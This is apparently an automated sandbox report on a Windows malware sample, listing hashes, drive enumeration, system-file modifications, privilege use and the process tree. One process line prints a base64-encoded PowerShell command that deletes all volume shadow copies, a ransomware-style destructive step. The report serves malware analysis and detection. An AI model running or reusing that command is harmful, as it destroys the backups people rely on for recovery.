Analysis
-
max time kernel
170s -
max time network
134s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
24-01-2022 01:50
Static task
static1
Behavioral task
behavioral1
Sample
7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
Resource
win10-en-20211208
General
-
Target
7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
-
Size
171KB
-
MD5
999660513492abf77dcd46db5ae97f17
-
SHA1
2c75960079eb449183dc284ca64845f663ab5a61
-
SHA256
7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678
-
SHA512
d988bde1189122a268dbbad2b61459b1238884d79a22cf7a4e52dfb4cd3f87ca3e1e31d30b71a58a99d54446d5ae3f7d117f4eae4fbf715a761da61845666f46
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exedescription ioc process File opened (read-only) \??\G: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened (read-only) \??\H: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened (read-only) \??\N: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened (read-only) \??\P: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened (read-only) \??\V: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened (read-only) \??\Y: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened (read-only) \??\B: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened (read-only) \??\E: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened (read-only) \??\J: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened (read-only) \??\K: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened (read-only) \??\Q: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened (read-only) \??\T: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened (read-only) \??\U: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened (read-only) \??\A: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened (read-only) \??\F: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened (read-only) \??\Z: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened (read-only) \??\I: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened (read-only) \??\X: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened (read-only) \??\O: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened (read-only) \??\R: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened (read-only) \??\S: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened (read-only) \??\W: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened (read-only) \??\L: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened (read-only) \??\M: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe -
Drops file in Windows directory 64 IoCs
Processes:
7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exedescription ioc process File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-com-base.resources_31bf3856ad364e35_10.0.15063.0_en-us_c99395587677579e_wintypes.dll.mui_36d5f25a 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-efs-service.resources_31bf3856ad364e35_10.0.15063.0_ja-jp_8cc7306242e6495d.manifest 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-network-security_31bf3856ad364e35_10.0.15063.0_none_de38492263599171_fwpuclnt.dll_d0a74ee5 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-w..eservices.resources_31bf3856ad364e35_10.0.15063.0_ja-jp_193bb5ceb03ac714_sti.dll.mui_00a4f15b 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-coresystemminpnp_31bf3856ad364e35_10.0.15063.0_none_1b70ea73251f149e_umpnpmgr.dll_112f9bb4 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-d..vices-sam.resources_31bf3856ad364e35_10.0.15063.0_fr-fr_c816ea8b6b3f385c_samsrv.dll.mui_32250491 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-twinapi_31bf3856ad364e35_10.0.15063.0_none_cc71085d9f6d2948_twinapi.dll_1b801978 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-w..gon-tools.resources_31bf3856ad364e35_10.0.15063.0_en-us_26c069caca82e24a.manifest 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-client-li..m-service.resources_31bf3856ad364e35_10.0.15063.0_ja-jp_8233e5ccdf89b440.manifest 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..iagnostic.resources_31bf3856ad364e35_10.0.15063.0_fi-fi_66e3922ab91bb38c.manifest 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..nager-efi.resources_31bf3856ad364e35_10.0.15063.0_es-mx_91ee18a020767d27_bootmgfw.efi.mui_a6e78cfa 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-i..er-engine.resources_31bf3856ad364e35_10.0.15063.0_it-it_e4e0927161ba0fe9.manifest 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-i..er-engine.resources_31bf3856ad364e35_10.0.15063.0_sl-si_3f840760de482318_msimsg.dll.mui_72e8994f 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..nager-efi.resources_31bf3856ad364e35_10.0.15063.0_es-mx_91ee18a020767d27_bootmgr.efi.mui_be5d0075 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-dynamicvolumemanager_31bf3856ad364e35_10.0.15063.0_none_ee169b3bbef79054_volmgrx.sys_f02896c6 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-font-bitmap-terminal_31bf3856ad364e35_10.0.15063.0_none_2583321dfa2b45c4_app857.fon_e51c02f4 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-wmilib_31bf3856ad364e35_10.0.15063.0_none_6a68d3903cfb6ab2_wmilib.sys_0dcce989 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-usermodensi.resources_31bf3856ad364e35_10.0.15063.0_de-de_a474196929c3e020.manifest 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-client-li..m-service.resources_31bf3856ad364e35_10.0.15063.0_ja-jp_8233e5ccdf89b440_clipsvc.dll.mui_18823613 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-dfsclient_31bf3856ad364e35_10.0.15063.0_none_98ae07171eea9e46_dfsc.sys_ff9a943d 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-font-bitmap-fixed_31bf3856ad364e35_10.0.15063.0_none_9023bb87676e429a_hvgafix.fon_bf27df1c 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-rasbase-core_31bf3856ad364e35_10.0.15063.0_none_42fa52cffce831fb_ndproxy.sys_4a9480d5 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-s..-netlogon.resources_31bf3856ad364e35_10.0.15063.0_en-us_40d75e23579ee338_netlogon.dll.mui_ecbeb9bd 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-font-bitmap-oem_31bf3856ad364e35_10.0.15063.0_none_0e77f624e73557a1_vga950.fon_09ed4d3d 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-font-bitmap-system_31bf3856ad364e35_10.0.15063.0_none_946aa6202fade3c5_vgas1257.fon_a23f7007 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-rasserver.resources_31bf3856ad364e35_10.0.15063.0_fr-fr_2ed7c061e8031d3f_mprdim.dll.mui_11b5ef08 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-wbiosrvc.resources_31bf3856ad364e35_10.0.15063.0_en-us_fca37a8068e89c2a.manifest 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-win32kbase.resources_31bf3856ad364e35_10.0.15063.0_de-de_88e19e6ec3d70899.manifest 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-f..e-microsoftjhenghei_31bf3856ad364e35_10.0.15063.0_none_765491bc18e3ab9b_msjh.ttc_ea675e59 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-ntdll_31bf3856ad364e35_10.0.15063.0_none_69eab77b34fc657e.manifest 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-ntfs_31bf3856ad364e35_10.0.15063.0_none_b78502f655ba52fb_ntfs.sys_e80dca04 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-t..localsessionmanager_31bf3856ad364e35_10.0.15063.0_none_b658a5fa435968f5_workerdd.dll_a9a6f55a 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-r..intmapper.resources_31bf3856ad364e35_10.0.15063.0_de-de_52bbcd224381180e_rpcepmap.dll.mui_349798e1 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-rasserver.resources_31bf3856ad364e35_10.0.15063.0_en-us_8c54ed7ef50a1538_mprdim.dll.mui_11b5ef08 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-s..-webauthn.resources_31bf3856ad364e35_10.0.15063.0_ja-jp_611de588d2557d78_webauthn.dll.mui_acc69b8d 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-s..ertificates-utility_31bf3856ad364e35_10.0.15063.0_none_9a11856b637894e6.manifest 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-sens-service.resources_31bf3856ad364e35_10.0.15063.0_en-us_2655bd395ad3f038_sens.dll.mui_64739194 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-tcpip.resources_31bf3856ad364e35_10.0.15063.0_de-de_34657c991714ac40_tcpipcfg.dll.mui_a5479fc1 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-version_31bf3856ad364e35_10.0.15063.0_none_2612286889b4755c.manifest 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-acpiex_31bf3856ad364e35_10.0.15063.0_none_45de7edd11c7c1ce.manifest 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-font-bitmap-fixed_31bf3856ad364e35_10.0.15063.0_none_9023bb87676e429a_cvgafix.fon_c20a9ed9 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-keyiso.resources_31bf3856ad364e35_10.0.15063.0_es-es_1b6a375ead065e2c.manifest 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-n..-domain-clients-svc_31bf3856ad364e35_10.0.15063.0_none_5522510b24d3f7d4_ipsecsvc.mof_713662d2 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-rasserver.resources_31bf3856ad364e35_10.0.15063.0_de-de_e3641786062c0973.manifest 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-w..gon-tools.resources_31bf3856ad364e35_10.0.15063.0_en-us_26c069caca82e24a_wlrmdr.exe.mui_ee563c83 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-appidcore_31bf3856ad364e35_10.0.15063.0_none_3fe4b2c9ef33a509_srpapi.dll_5f1dbe43 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..nager-efi.resources_31bf3856ad364e35_10.0.15063.0_pt-pt_9269d4068ddf1552.manifest 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-font-bitmap-system_31bf3856ad364e35_10.0.15063.0_none_946aa6202fade3c5_s8514sys.fon_30e5bd9f 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-font-bitmap-system_31bf3856ad364e35_10.0.15063.0_none_946aa6202fade3c5_svgasys.fon_32986711 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-kernelstreaming_31bf3856ad364e35_10.0.15063.0_none_68949b90ceb2d4b5.manifest 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-a..llservice.resources_31bf3856ad364e35_10.0.15063.0_fr-fr_1164be3dcef90997.manifest 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..iagnostic.resources_31bf3856ad364e35_10.0.15063.0_pl-pl_c7457c7a32053978_memtest.efi.mui_71e15c22 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-time-service.resources_31bf3856ad364e35_10.0.15063.0_ja-jp_92e9ee428a325ae8_w32time.dll.mui_b382d4b4 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-i..er-engine.resources_31bf3856ad364e35_10.0.15063.0_en-gb_50ad0e299c666e9f_msimsg.dll.mui_72e8994f 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-s..-netlogon.resources_31bf3856ad364e35_10.0.15063.0_ja-jp_6fa7a65a14e4e298.manifest 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_10.0.15063.0_es-es_8777f0231cf98180.manifest 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-u..istration.resources_31bf3856ad364e35_10.0.15063.0_en-us_74d5f5c7b3aae50f_userdeviceregistration.dll.mui_22ab8f29 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-wininit.resources_31bf3856ad364e35_10.0.15063.0_en-us_567969ff4355ff0f.manifest 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-rpc-local_31bf3856ad364e35_10.0.15063.0_none_c50e78507de308c7_rpcrt4.dll_5aa847dd 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..nager-efi.resources_31bf3856ad364e35_10.0.15063.0_cs-cz_4c9582ba3ac14b79_bootmgfw.efi.mui_a6e78cfa 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..nager-efi.resources_31bf3856ad364e35_10.0.15063.0_tr-tr_1e151a8658a5afca_bootmgr.efi.mui_be5d0075 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-font-bitmap-fixed_31bf3856ad364e35_10.0.15063.0_none_9023bb87676e429a_8514fix.fon_dc96978e 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-i..er-engine.resources_31bf3856ad364e35_10.0.15063.0_zh-tw_bbb8710b7c21d8e6_msimsg.dll.mui_72e8994f 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-lua.resources_31bf3856ad364e35_10.0.15063.0_en-us_ff9ea33ba51dcc3d_appinfo.dll.mui_cfd93456 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exepowershell.exepid process 3320 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe 3320 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe 408 powershell.exe 408 powershell.exe 408 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 408 powershell.exe Token: SeBackupPrivilege 3580 vssvc.exe Token: SeRestorePrivilege 3580 vssvc.exe Token: SeAuditPrivilege 3580 vssvc.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exedescription pid process target process PID 3320 wrote to memory of 408 3320 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe powershell.exe PID 3320 wrote to memory of 408 3320 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe"C:\Users\Admin\AppData\Local\Temp\7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe"1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/408-120-0x000001903F4B0000-0x000001903F4D2000-memory.dmpFilesize
136KB
-
memory/408-125-0x0000019041660000-0x00000190416D6000-memory.dmpFilesize
472KB
-
memory/408-126-0x000001903F500000-0x000001903F502000-memory.dmpFilesize
8KB
-
memory/408-128-0x000001903F503000-0x000001903F505000-memory.dmpFilesize
8KB